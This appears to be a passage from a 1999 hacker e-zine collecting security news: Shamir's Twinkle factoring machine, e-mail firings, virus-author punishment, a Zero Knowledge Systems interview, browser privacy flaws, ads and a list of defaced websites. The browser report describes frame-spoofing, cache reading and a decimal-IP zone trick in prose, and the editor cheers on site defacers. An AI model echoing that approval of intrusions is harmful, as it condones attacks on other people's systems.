mechanism would be as effective as about 100 to 1,000 PCs. Not just that, but the machine could be easily built with little funding, Shamir
says that a Twinkle machine could be built for as little as $5,000. On the other hand the DES Cracker cost the Us government $250,000
to build.
This report was partly contributed by Wired
Related Links:
Wired News
http://www.wired.com/news/news/technology/story/19493.html
RSA
http://www.rsa.com
ZDNN Indirectly Related
http://www.zdnet.com/zdnn/stories/news/0,4586,2254799,00.html
Wired;
The Light That Cracks the Code
by Chris Oakes
5:00 p.m. 4.May.99.PDT
A computer scientist has designed a light-based computer that could unscramble data to a degree well
beyond that typically used in e-commerce.
"Twinkle," a yet-to-be-built crypto-cracking machine, was introduced Tuesday by famed computer scientist
Adi Shamir at the Eurocrypt '99 conference in Prague.
Shamir's Twinkle proves an oft-repeated point: To adequately hide electronic information from prying eyes,
data needs to be locked up beyond the limits of technology in common use today.
The strength of a given cryptography scheme is expressed in the number of bits in the "key" required to
unlock the code. For example, popular encryption programs used in the United States support the equivalent
of 1024- to 2048-bit security. Each additional bit doubles the strength of the cipher from trial-and-error
attacks.
Twinkle can quickly determine the correct key for unlocking messages that have been encrypted with 512-bit
keys, said Shamir, who is also co-inventor of the RSA public-key algorithm -- a de facto standard for Internet
security.
"[This] remind[s] people that yes, what the experts have been saying about key size is really the case," said
Burt Kaliski, chief scientist at pioneer encryption company RSA Data Security, which built its business around
the encryption algorithm.
Kaliski said the Twinkle design confirms previous expectations about the appropriateness of RSA keys as long
as 512 bits. But he emphasized that larger key sizes are still out of reach despite Shamir's advance.
"The primary impact [of Twinkle] is that it makes 512-bit keys for RSA more at risk than was previously
considered," said Kaliski. "It will have a similar effect to the Deep Crack machine."
Deep Crack is a specially designed supercomputer that in July 1998 first cracked the level of encryption used
to secure most nonclassified government data. In January 1999, with an Internet-wide volunteer computer effort
and the Electronic Frontier Foundation behind the project, Deep Crack unlocked a message secured with the 56-bit
Data Encryption Standard -- the equivalent of a 384-bit RSA key -- in a mere 22 hours and 15 minutes.
Deep Crack was designed to send a message to the US government that the strongest data-scrambling technology
legally allowed to leave American shores is no longer strong enough to be useful.
Public-key cryptography is secure because it hinges on a mathematical truth -- it's very difficult to find two
prime factors of another known number. The Twinkle machine would greatly accelerate the process of collecting
equations, which is the first step in factoring a large number. This step, known as "sieving," is a key to
deciphering an RSA-encrypted message.
The second step in the factoring process entails calculating the equations once they are collected, and it is
the main method for determining an RSA key. Twinkle stands for "The Weizmann Institute Key Locating Engine."
Unlike the purely electronic design of the conventional computer, Twinkle is based on optoelectronics, which
uses light to transmit digital information, similar to the way fiber-optic cables rely on light instead of
electrical impulses over copper wire to transmit signals.
Shamir estimates that the device would be as powerful as about 100 to 1,000 PCs in the factoring process.
Further, the machine could be easily built with little funding. While the DES Cracker cost US$250,000 to
construct, a Twinkle machine could be built for as little as $5,000, he said.
Bruce Schneier, president of cryptography firm Counterpane Systems said Shamir has come up with a very clever
approach to an academic problem.
"This is brilliant, really brilliant stuff," Schneier said. "Once you read the paper it's extremely obvious.
There's a lot of engineering between the paper and reality. But it's certainly doable. Nothing [in the design]
is insurmountable."
The significance of Twinkle is mathematical, rather than a political statement about encryption, Schneier said.
"This is academic research."
Encryption expert Matt Blaze, an encryption researcher at AT&T Labs, said Twinkle doesn't change the theoretical
strength of the RSA encryption algorithm. But "if Twinkle's approach turns out to be practical it will force us
to reconsider the appropriate minimum length of RSA keys."
Blaze does see potential political repercussions from Shamir's advance. "If Twinkle is practical, it would
provide a similar demonstration of the weakness of the public key systems allowed for export."
Will anyone seek to build a machine based on Twinkle? No doubt, Schneier said. "If you were a government and your
business is learning what other
governments are saying, you'd be a fool not to build this machine. I'm sure the [National Security Agency] is
studying it very carefully."
@HWA
47.0 25 fired due to e-mail abuses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
25 FIRED BECAUSE OF E-MAIL ABUSE
by BHZ, Saturday 8th May 1999 on 2:39 pm CET
About 25 employees who used electronic mail for non-business reasons have been
fired at Edward Jones, successfully brokerage firm. Spokeswoman from the firm didn't
share information about what did they actually do, but she said: "It is not acceptable
to use the Internet for nonbusiness-related purposes. Read the article below
http://www.postnet.com/postnet/stories.nsf/86964efc7e86f67886256743007c8f4b/a118a96450a70b548625676a00385c01?OpenDocument
Brokerage firm here fires 25 for e-mail abuse
By Paul Hampel
Of the Post-Dispatch
About 25 employees who used electronic mail for non-business reasons have been fired at Edward Jones, a
spokeswoman for the brokerage firm said Thursday.
Besides last week's firings, another 48 employees were suspended, said one employee, who asked not to be
identified.
"When people get Internet access at Edward Jones, they know the policy of the firm," said Mary Beth Heying, a
spokeswoman for the company. "It is not acceptable to use the Internet for nonbusiness-related purposes."
She refused to say specifically why the employees were disciplined, what the company's e-mail policies are and
how the disciplined employees had violated them. Several employees who spoke anonymously said they
understood that some of the infractions involved off-color jokes.
"E-mail goes through the Internet," Heying said. "So, generally speaking, we're talking about people whose
employment was terminated for Internet abuse."
The company, which has its headquarters here, issued a memo on April 27 that instructed employees who had
sent e-mails containing pornography or off-color jokes to report to the personnel office by April 29, one
employee said.
Like all the Edward Jones employees interviewed for this story, the employee asked that his name not be used.
The day after the memo was circulated, the personnel department was jammed with people wondering if they
had violated the policy, said the employee.
"Nothing got done last week at Edward Jones," he said. "Everyone was freaked out."
Heying issued a statement on behalf of the company that said:
"We at Edward Jones have zero tolerance with regard to Internet abuse. This policy has been clearly
communicated to our associates.
"Although we cannot comment on specific situations, we have a responsibility to provide our nearly 14,000
associates a workplace free from Internet abuse."
Heying said the firings were confined to the 2,300 employees distributed among the three campuses that make
up the company's international headquarters. They're located in Maryland Heights, in Maryville Center in West
County and in Des Peres.
The brokerage firm - which Heying said was the world's ninth largest - also operates 5,000 branch offices
across the country, as well as in Canada and the United Kingdom. The firings did not affect the branches, she
said.
Employees interviewed Thursday afternoon on the parking lot at the Maryland Heights campus at 201 Progress
Parkway said rumors were circulating that the number of people fired was higher than Heying's estimate.
Some saw a rainbow in the firings. "This is awful to say, but the firing could actually be good news for me," said
one young employee. "It could mean I'll move up in this company."
Another employee, a woman, said she had heard that some of those fired had been sending dirty jokes to one
another.
"All the big companies seem to be firing people for sending dirty e-mails," she said. " It's happened the last two
or three places I've worked."
A former Edward Jones employee, who left to pursue other business interests, said the company zealously
monitored employee communications.
"Edward Jones is the most technologically advanced firm I've ever seen," said the man. "They monitor
telephone calls and e-mails. They are able to track everything."
@HWA
48.0 Punishment CIH vs MELISSA
~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
PUNISHMENT
by BHZ, Saturday 8th May 1999 on 2:33 pm CET
SF Gate published an article about two actual virus cases: David Smith's (Melissa
creator) and Chen Ing-hau's (CIH creator). They do some parallels between them, and
from it some strange things could be seen. CIH virus was more destructive (because
it deletes all data), but its creator was just suspended from his university. David
Smith could get up to 40 years of imprisonment. Read the article below;
http://www.sfgate.com/technology/expound/
Stopping The Deadly Virus
Punishment won't cure this ill
Neil McAllister, Special to SF Gate
Perhaps the only thing more frustrating than the damage caused by viruses is the realization that one
has very little recourse when they do strike.
They're a hit-and-run by an unknown assailant.
No wonder Melissa virus creator David Smith's arrest and pending trial is viewed by many with
such pernicious glee. For once, it seems, one of these faceless delinquents will be brought to justice,
and get what he deserves.
Compare Smith's case with that of Taiwanese information engineer Chen Ing-hau. Taipei
authorities recently fingered the 24-year-old man as responsible for the highly damaging CIH, or
"Chernobyl" virus -- so named because it strikes on anniversaries of the April 26, 1986 Soviet nuclear
disaster. Chernobyl's last outbreak erased data on tens of thousands of computers worldwide,
rendering many unusable.
But while David Smith could potentially land more prison time than some repeat rapists, the only
punishment Ing-hau has received to date for his role in creating the virus has been a demerit from the
Tatung Institute for Technology, where he studied computer science. That was over a year ago.
Unlike Melissa, it seems Chernobyl's victims have very little hope of restitution for data lost to the
virus. So while there may be an opportunity to finally make an example of David Smith, I question
whether slapping a programmer with a 40-year sentence will really contribute much to ending the
threat of malicious software. Before we go blindly locking away virus authors, maybe we should first
examine their motives.
First an admission: David Smith and I have something in common. Perhaps my life of crime
eventually might have landed me in the same spot in which Smith now finds himself -- had I maybe been
just a little bit better at it.
Melissa wreaked havoc on networks nationwide in March, using a combination of Microsoft's Word
and Outlook software for Windows to spread copies of itself rapidly across the Internet, via email.
The resulting flood of messages soon choked afflicted mail servers, rendering them incapable of
processing genuine email as they struggled beneath the load of Melissa-generated mail. It was the first
big virus outbreak of 1999.
My own career in computer virus authoring ended years ago, before there was much of an Internet,
and when MS-DOS was the PC operating system of choice. Dubbed Leprosy-B, my last (and
somewhat ineffectual) virus was the follow-up to a similarly timid program I'd written earlier, called
(predictably enough) Leprosy.
About 10 minutes after putting the finishing touches on Leprosy-B, I accidentally let it loose on my own
hard drive. It promptly infected half my development tools and a random number of system
files, before I could get it in check. As I embarked on a long night of re-installing infected software, I
got my first real taste of what a royal pain in the ass computer viruses can be.
As a teenager, crippling entire computer networks worldwide was the farthest thing from my mind as I
toiled late nights writing the Leprosy virus. For one thing, I just wasn't skilled enough a programmer to
pull off such a feat -- but it was a lot easier to write a tiny virus program than a huge application, like a
word processor.
Today, even complete novices can create their own computer virus with the help of one of the several
"virus construction kits" available for download from some hacker sites on the 'Net. Most virus
software, in fact, remains no great wonder, relying on a small number of instructions to achieve a few
clever tricks. It's generally a fluke when one manages to travel as widely and achieve its goal as
successfully as Chernobyl or Melissa.
While some virus outbreaks might accurately be categorized as industrial espionage, most virus
authors seek little more for their efforts than a certain kind of notoriety within the computing
underground. Getting your virus out into public circulation is a little like spray painting your name
on walls: It's a way to gain recognition amongst your peers. But while most graffiti taggers might
hesitate before defacing the ceiling of the Sistine Chapel, viruses generally make no distinction about
which systems they destroy.
Since most virus attacks tend to be executed with all the cunning of throwing eggs at a passing car,
maybe the solution lies elsewhere besides prosecuting the authors of these tiny terrors. Maybe
it's time we addressed the issue of what makes viral software possible to begin with.
As the number of computer viruses has grown over the years, a cottage industry of anti-virus software
has appeared to combat the problem. We regularly hear about anti-virus software causing various
crashes and conflicts with other programs. None of these packages, however, does very much to strike
at the root cause of computer viruses -- the vulnerability of the operating system itself.
Sun Microsystems had the right idea with the "sandbox" security model of its Java language. Java
applets downloaded from an untrusted source on the Web aren't allowed access to most of the OS
features that would allow a virus to spread. Sun realized that the creation of a globally networked
computer environment meant new security measures had to be developed to protect users
from all their new neighbors. It's an idea as simple as installing a deadbolt on your front door.
Contrast Sun's ideas to Microsoft's, whose decision to build a complete programming language
into its word processor without any significant security measures spawned an entire new
subcategory of Macro Viruses -- now one of the most commonplace forms of viruses encountered.
Melissa itself fell into this category. Further, Microsoft's ActiveX technology for the Web can
allow viral code to run virtually unchecked on a Windows computer directly over the network.
I'm not about to say David Smith shouldn't be held responsible for damages caused by Melissa should
he be found guilty of creating and releasing that virus. But I also feel it's the responsibility of
software manufacturers to adapt to the vulnerabilities of today's networked computing
model by creating secure software environments for us to work in. The technology exists; it's only a
matter of making an effort to deploy it.
Try asking your operating system vendor sometime what steps they're taking to protect you from attack
by hostile software. If the answer you get is that they're helping to prosecute David Smith, don't buy
it.
Today there are hundreds of David Smiths worldwide, and a new David Smith is born every
day. There's only one Microsoft. Can't they do any better than to point the finger?
@HWA
49.0 World of freedom: An interview with Zero Knowledge Systems, by BHZ
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
WORLD OF FREEDOM IS COMING
by BHZ, Friday 7th May 1999 on 3:23 pm CET
Privacy. The word which is often in the news. Is Big Brother watching? Well if he is,
then he is finished. New program, called Freedom will change it all. It will base on
new Freedom network (world's ISPs join forces on this matter). Read here on HNS,
exclusive interview with Jordan Socran from Zero-Knowledge Systems, company
behind Freedom. See how will you be able to surf, chat and use e-mail 100%
anonymously. So read the interview in our Special Report.
Special Report;
http://www.net-security.org/spec/zks/index.htm
If you may know, because many news sites wrote about Freedom, this new program
will secure us in the future. What is Freedom? How will it work? Why the company
has been "attacked" by Intel? Find the answers in exclusive interview with
Jordan Socran, manager of partnership programs for ZKS.
With Freedom to 21st century
<BHZ> ZKS is a famous company now, when was it founded and with what plans?
<ZKS> ZKS is founded in 1997 to provide Net users with a way to protect their
privacy online. Plans are to offer users the ability to set up and manage multiple
digital identities that they can use online. This way they can enjoy all the benefits of
the Net without sacrificing their privacy. We wanted to let people enjoy the privacy
they have in the physical world on the Internet. Freedom is the way they can.
<BHZ> Freedom is first project created by ZKS?
<ZKS> Yes. We are scheduled to release the beta later this month and Freedom 1.0
later this summer. Freedom is the only thing we are working on since ZKS was
started. In the future, we plan on releasing Freedom for kids, to protect children online
as well as a version of Freedom that can be used on an Intranet, i.e. behind a firewall.
This current version is for personal use only.
<BHZ> On what basis Freedom works?
<ZKS> We invented a technology we are calling PIP - Privacy Enhanced Internet
Protocol. We looked at all the current remailing technologies, etc, including
onion-routing, Penet.fi and many others. We have figured out a way to go beyond
these systems to maximize the efficiency of anonymous re-routing and strong crypto.
Freedom removes identifying information, encrypts data packets multiple times and
routes them through a series of Freedom Servers, hosted by ISP's around the world.
<BHZ> You made big marketing for Freedom, many sites have Freedom buttons for
several months...
<ZKS> We have actually done very little marketing. We have not spent any money
promoting Freedom. We have received a lot of press due to the nature of our product
and people all over the world have communicated with one another without ZKS
intervention.
<ZKS> The sites of people with buttons - these people have found us :)
<BHZ> But you have affiliates, which can earn money if visitors from their site buy a
copy of freedom?
<ZKS> Yes. we now have over 1000 ! :) The difference is that these people believe in
the cause, not just the money. We want to give the power back to the people, that is
why we say that Freedom empowers . We want to make a change.
<ZKS> We are NOT just out to make $$
<BHZ> Well to people privacy is very important. On your opinion, will Freedom
become the best and most famous of all security solutions?
<ZKS> Maybe, maybe not - the people will decide. We will release Freedom for the
people that need it most. The people in Human Right organizations, people in
countries where the gov't doesn't let them enjoy the Internet, people who wish to be
private on the Net. We hope other companies will begin to offer solutions as well that
help the people do this. Will Freedom be the most secure? We will see. It is a
dangerous thing to offer partial security...
<BHZ> On what operating systems will Freedom run?
<ZKS> This version is for Windows only. We will be looking at other platforms as
soon as we release to port the client to - i.e. Linux, Mac, etc. We hope to one day go
open source...
Freedom network
<BHZ> So when someone buys Freedom, how is the program reacting to hide the
real identity of the customer?
<ZKS> We use a double-blind registration process. the download is free. You can
download Freedom as many times as you wish - at home, at work, etc. You then go
online to buy tokens. Each token can be redeemed to activate one pseudonym (nym)
on the Freedom Network for a 12 month period. The token is just a serial number. We
have created a pool of millions of tokens. When you buy a token, you pull it out of the
token pool. We do not know which token you received. Our server checks to see if it
is a valid token but we don't know who received the token.
<BHZ> So client with installed Freedom program connects to Freedom network. It is
all crypted... So how fast is it then?
<ZKS> We have overcome many of the slowdowns that using strong crypto would
bring. Users in North America will not notice a slowdown. In Europe, it will depend on
where you are and how many ISP's are running Freedom Servers in your area. Where
the Internet backbone is strong, Freedom will be faster.
<BHZ> So how many ISPs are connected into Freedom network?
<ZKS> Right now 50 ISP's on 4 continents - Australia, Austria, Canada, Japan,
Netherlands, UK and the United States
<BHZ> And what are the plans, to enlarge your network?
<ZKS> We are promoting the Freedom Server program by advertising to ISP's, online,
at conferences, etc. Many ISP's have heard about it and are contacting us. Since we
announced the Freedom Network, we have received _many requests from ISP's
around the world (many in Europe) about joining the network. It will grow as people
hear about and begin using - Freedom
<BHZ> How big is the team behind Freedom?
<ZKS> We are 35 people here at Zero-Knowledge, including Ian Goldberg (Ian
cracked the 40 bit DES code in the RSA Data Security challenge in 3.5 hours. He
also cracked the GSM Cellular phone standard and the Netscape SSL). k
<BHZ> Very impressive... He is very useful in Freedom project
<ZKS> Yes, he is helping a lot with security. He is one of the "WiReD 25" the 25
people Wired Magazine listed as most likely to influence the future of the Internet.
Pentium Serial Number (PSN) exploit
<BHZ> So as you work on privacy, you found a way to read PSN (Pentium Serial
Numbers) from computer with Pentium III chip?
<ZKS> Yes. We realized that the software fix Intel issued to turn off the identifier,
was easily compromised
<BHZ> And you released public script that exploits that "turn off" function on PIII
running computers?
<ZKS> No. The script is not public. We posted a demonstration on our site that
shows you that the identifier is not secured by the Intel patch, plus we digitally signed
the demonstration so that people would know it was just ZKS demonstrating.
<BHZ> It uses active X controls?
<ZKS> It was written in ActiveX, yes.
<BHZ> How were reactions from the public?
<ZKS> We got tremendous support from the public for exposing the flaw.
<BHZ> Ok so public reacted in positive way, but you had some problems with Intel?
<ZKS> Yes, Intel asked Symantec to label the demonstration as a malicious virus,
and they did. This brought even more support and led to the current controversy.
<BHZ> Were you contacted by Intel directly?
<ZKS> We had originally contacted them to tell them about the problem with the chip
and ways to resolve them. We hoped that Intel would act to address these very
serious privacy concerns...
<BHZ> And then they "attacked" your exploit saying that it is malicious...
<ZKS> Yes.
<BHZ> So what is the current situation between ZKS and Intel?
<ZKS> We are still trying to discuss this with Intel and we hope they will be
responsive... but as of now, they don't seem ready to address the issue
<BHZ> Well public is on your side, even hackers are on your side... Just to note that
www.freedom.edu was hacked earlier today stating "sad but true, freedom is an
illusion" and they told their opinions on Intel-ZKS situation.
<ZKS> Is it? ;) The Freedom we're releasing will not be an illusion. We are thankful to
have the hacker community on our side, helping us to evaluate the software and
offering their suggestions in increasing its security, if need be.
<BHZ> How much will Freedom cost?
<ZKS> Freedom is free (the software). You have to buy tokens. We are selling them
for $50 USD for a package of 5 tokens. Each one can be used to activate 1 nym on
the Freedom Network for 1 year (12 months).
ZKS website - http://www.zks.net
BHZ
bhz@net-security.org
http://net-security.org
@HWA
50.0 Trojan B'Gone
~~~~~~~~~~~~~
From http://www.net-security.org/
TROJAN B' GONE
by BHZ, Thursday 6th May 1999 on 11:45 am CET
Dark Eclipse Software, programming groups that released BackDoor trojan and
AIM recover, published info about new trojan scanner. New features will be: Scan for
trojans in different ways for effectiveness and speed, scan ports to see if trojans are
on them, view programs loading with windows or running in the memory, monitor ports
for people trying to use trojans and you could create your own trojan plugins with our
plugin creator. Visit Trojan B' Gone section at link below
http://216.71.96.168/des/software/tbg/index.html
@HWA
51.0 The New Generation of Browsers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NEW GENERATION BROWSERS
by BHZ, Thursday 6th May 1999 on 11:55 am CET
Our new special report, written by Thejian, is called New Generation Browsers: Are
they worth the fuzz? So you could guess, he speaks about different aspects of
new-wave browsers and lists the common bugs in them. Read the Special Report
below;
The New Generation Browsers: Are they worth the fuzz?
The general public is becoming more and more security- and, even
more so, privacy-concious. Finally the realization that there's no
real legitimate reason for things as the MS GUID (global unique
identifier, a "feature" of the Microsoft Office package wich lets
the apps MS Word and MS Excel add an id-tag to every created
document wich makes it possible to trace this back to its original
creator). Because of this it's not that awkward to hear the major
browser-developers make claims about their browsers capabillities
in this field. But are these claims justified? Previous versions
of the Netscape and Opera browsers contained some serious flaws,
not to mention the huge breach of security Microsofts Internet
Explorer was. The purpose of this document is to explore various
major flaws in the "new generation browsers" to provide the general
public with the means to make a good comparison. Naturally the
manufacturers of these new browsers will do everything to assure
the public they got it right this time, this document will try to
figure out how close to the truth these claims really are.
The problems:
1. Frame-spoofing
The frame-spoofing exploit allows Web sites to insert its own frames
into a third-party site in the window of a surfer who visits both
sites. The risk here is that an unsuspecting user who might be
submitting credit card or private information to a trusted site
unknowingly leaks this info to a third party. Since the discovery of
this hole several variations (like the "window-spoofing" instead of
"frame-spoofing" exploit).
This bug has plagued all the major browsers. The problem is that these
browsers allow the manipulation of frames across domains. This hole was
announced patched by restricting the writing of frames to a single domain.
Opera went even as far as to restrict this to pages originating from the
same server.
2. "Caching"
This bug allows the webmaster of a malicious site to view the contents of
a users cache by utilization of Javascript. In a twist on this, it has also
been proven possible by Juan Carlos Cuartango to read the contents of an
users clipboard among other things. Since most users are relying heavily
on "cut/paste"-functions this of course should also be considered a major
security-/privacy-hole. This one also was announced patched.
But..
But guess what? The new Microsoft Internet Explorer 5 still allows the
frame-spoofing and reading of local files as described by G. Guninski
(http://www.whitehats.com/guninski/read.html) on the Bugtraq mailinglist.
And yes, Netscapes new baby is still vulnerable too.
Another bug, known as the security zone bug, in IE 4 and 5 (by connecting
to http://3475932041 the browsers surfs to the MS Web site, because Winsock
translates the URL as an existing IP. Problem here is that the browser figures
the site is within the "trusted local intranetzone" and because of this
automatically submits usernames and passwords without asking for confirmation
by the user) is partially fixed but this one can also still in some way or another
be exploited. Opera did a pretty decent job at plugging the spoofing-hole, but
that company recently discovered it still is possible to make a browser try and
open up a fake frame, but in the process using the wrong adress. Patches for this
problem are expected to keep the browser from opening the frame at all, but hey,
there hasn't really been lived up to those expectations recently has there?
The new versions of these browsers even have some nice new "features":
- Microsofts Internet Explorer 5 now contains a so-called Auto-Complete function.
When users begin typing in a URL, IE will suggest possible matches from sites
they have recently visited. This can save a user from having to type out long URLs.
It can also help people find sites they visited but did not bookmark. Problem is
though, that this feature also applies to online forms. Because of this data like
username/password combinations are remembered by the browser. Nice feature
when you're on a shared computer eh? Advised is to turn the Auto-Complete function
off.
- Another nice feature of the Internet Explorer 5 is that is notifies Web sites when
they get bookmarked by the user. This was an intended feature, it's supposed to help
webdesigners "brand" a users bookmarks. This feature enables in short a Web site to
put a logo up next to the corresponding bookmark (called "Favorites" in Internet
Explorer). The browser requests a file called favicon.ico to put the image in that
file next to the bookmark. While developing this function Microsoft obviously didn't
think (or just plainly ignored) the privacy of their users. A site could hypothetically
use the feature to build a log of a user's bookmarked pages. Visitors could be tracked
anonymously, by a cookie, or by name, if they registered at the site.
- Netscape has thought of something nice too. Netscape's (4.5) what's related
function connects to the rl.ld1.netscape.com site at random. For every 5 sites
you visit 1 connection is made to their server. This is probably to keep some
stats or something, but I actually enjoy having some privacy so you might want
to turn "what's related" off too.
As you've probably gathered from the above, the main problem with the "new generation
browsers" (as was with their predecessors) lies within the implementation of scripting
languages. This got illustrated this week by the alert that the so-called "anonymizing"-
services like Anonimyzer, Onion Router, Lucent Personalized Web Assistant and AIX Privacy
(wich are supposed to provide their users with stealth browsing without showing any
information about the users to the visited Web sites) allow sites to simply turn the
anonymizing-function off by using a Javascript redirect-tag. As was noted in response
to this alert, this is not a fault by the involved online services, but more one on the
users side.
If your privacy is truly dear to you, the best thing to do probably is turning
off the Javascript, Java and AxtiveX functions in your browser. It seems that browser-
manufacturers are just not ready for the use of those functions yet. It might get a tad
less colourful and sparkling on the Net, but hey, privacy isn't that bad either eh?
Anyone tried Lynx? Overflow-patch now availble..
Thejian
for Help Net Security
http://net-security.org
@HWA
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
<img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j
http:/ 99 http:o
http:/ login: sysadmin n99 httpi
/come. password: tp://comn
to/Can me.to/Cat
c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h
http:/ industry people to attend with booths and talks. 99 http:e
/come. you could have a booth and presentation for the cost of p://comel
http:/ little more than a doorprize (tba) contact us at our main n99http:i
http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s
http:/ for updates. This is the first Canadian event of its type invalid t
403 Fo and will have both white and black hat attendees, come out logged! !
404 Fi and shake hands with the other side... *g* mainly have some IP locked
ome.to fun and maybe do some networking (both kinds). see ya there! hostname
http:/ x99http:x
o/Canc x.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x
o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
<a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
BSOD Simulator
May 4, 1999
Users of Red Hat 6.0 are discovering a new feature that
hasn't been widely advertised: a Blue Screen of Death
simulator. By default, the bsodsim program activates when
the user hits the virtually unused SysRq key (this is
customizable), causing the system to switch to a character
cell console to display a ficticious Blue Screen.
Red Hat hails the bsodsim program as the "boss key" for the
Linux world. "Many old DOS games had a boss key, which
caused the program to switch to a DOS shell or a benign
looking screenshot when the boss walked by," a Red Hat
engineer explained. "This allowed unscrupulous workers to
play games without the knowledge of the PHB. With
multitasking, this isn't necessary anymore."
He continued, "However, a new 'boss problem' has emerged.
Workers are smuggling Linux boxes into companies that
exclusively use Windows. This is all good and well until
the PHB walks by and comments, 'That doesn't look like
Windows...' With bsodsim, that problem is solved. The
worker can hit the emergency SysRq key, and the system will
behave just like Windows..."
The bsodsim program doesn't stop at just showing a
simulated error message. If the boss doesn't walk away,
the worker can continue the illusion by hitting
CTRL-ALT-DEL, which causes a simulated reboot. After
showing the usual boot messages, bsodsim will run a
simulated SCANDISK program indefinitely. The boss won't be
able to tell the difference. If the boss continues to hang
around, the worker can say, "SCANDISK is really taking a
long time... maybe we should upgrade our computers. And
don't you have something better to do than watch this
computer reboot for the tenth time today?"
Red Hat 6.0 also includes a 'Flying Windows' screensaver
for use with X Windows. If the boss happens to walk by
your computer when you're away, he still won't be able to
tell that it's not running Windows.
---
James S. Baughn
http://i-want-a-website.com/about-linux/
@HWA
SITE.1 interScape.403-security.org Croatian phreaking group
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Should be online as of this release, interScape is a new phreak group that has found
a home on the 403-security server. AirWalk of interScape promises an ezine with h/p
articles and general security concerns along with other releases that are to appear
on the website is the Phreak Bible (in Croatian) version 2.0, an impressive looking
piece of work over 4M in size, expect to hear a lot from this group in coming months.
The phreak bible is also available on xoom (in croatian, there is no english version
planned or in the works at this time) at the following url;
http://members.xoom.com/interScape/phreak01.zip
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Astral reports that DT (Dutch Threat) cracked the following sites over the weekend
Anti NATO Serbian sites got hacked
Astral 02.04.1999 22:18
Today 6 Yugoslavian anti NATO sites were hacked by dutchthreat with message : "www.dutchthreat.org
condemns all activities againts human rights.Pro NATO, peace." Following sites were hacked :
May 2nd
www.pentagon.co.yu
www.italsrem.co.yu
www.martinart.co.yu
www.carbo.co.yu
www.net022.co.yu/crazy/nato.htm
www.net022.co.yu/nato/index.html
May 3rd
Cracked
www.bellsouth.com (D-Elite Crew)
www.ibm-teamplayers.com (cold fusion, not Domino? :-)
www.elektra.com (cold fusion)
www.conted.bcc.ctc.edu (cold fusion)
